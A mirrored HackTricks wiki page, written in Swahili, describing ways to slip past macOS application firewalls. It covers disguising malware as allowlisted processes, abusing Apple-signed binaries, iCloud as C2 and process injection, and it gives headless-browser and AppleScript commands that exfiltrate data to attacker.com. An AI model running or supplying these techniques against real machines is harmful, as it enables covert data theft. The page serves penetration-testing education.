maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

77 lines
2.2 KiB
Markdown
Raw Blame History

# macOS Bypassing Firewalls
{{#include ../../banners/hacktricks-training.md}}
## Mbinu zilizopatikana
Mbinu zifuatazo zilipatikana zikifanya kazi katika baadhi ya programu za firewall za macOS.
### Kutumia majina ya orodha ya ruhusa
- Kwa mfano, kuita malware kwa majina ya michakato maarufu ya macOS kama **`launchd`**
### Kibonyezi bandia
- Ikiwa firewall inahitaji ruhusa kutoka kwa mtumiaji, fanya malware **ibonyeze ruhusu**
### **Tumia binaries zilizotiwa saini na Apple**
- Kama **`curl`**, lakini pia wengine kama **`whois`**
### Tovuti maarufu za apple
Firewall inaweza kuwa inaruhusu muunganisho kwa tovuti maarufu za apple kama **`apple.com`** au **`icloud.com`**. Na iCloud inaweza kutumika kama C2.
### Kupanua kwa jumla
Wazo kadhaa za kujaribu kupita firewall
### Angalia trafiki inayoruhusiwa
Kujua trafiki inayoruhusiwa kutakusaidia kubaini tovuti zinazoweza kuwa kwenye orodha ya ruhusa au programu zipi zinazoruhusiwa kuziaccess.
```bash
lsof -i TCP -sTCP:ESTABLISHED
```
### Kutumia DNS
Marekebisho ya DNS yanafanywa kupitia **`mdnsreponder`** programu iliyosainiwa ambayo labda itaruhusiwa kuwasiliana na seva za DNS.
<figure><img src="../../images/image (468).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>
### Kupitia programu za kivinjari
- **oascript**
```applescript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
```
- Google Chrome
```bash
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
```
- Firefox
```bash
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
```
- Safari
```bash
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
```
### Kupitia sindano za michakato
Ikiwa unaweza **kushinikiza msimbo katika mchakato** ambao unaruhusiwa kuungana na seva yoyote unaweza kupita ulinzi wa firewall:
{{#ref}}
macos-proces-abuse/
{{#endref}}
## Marejeo
- [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink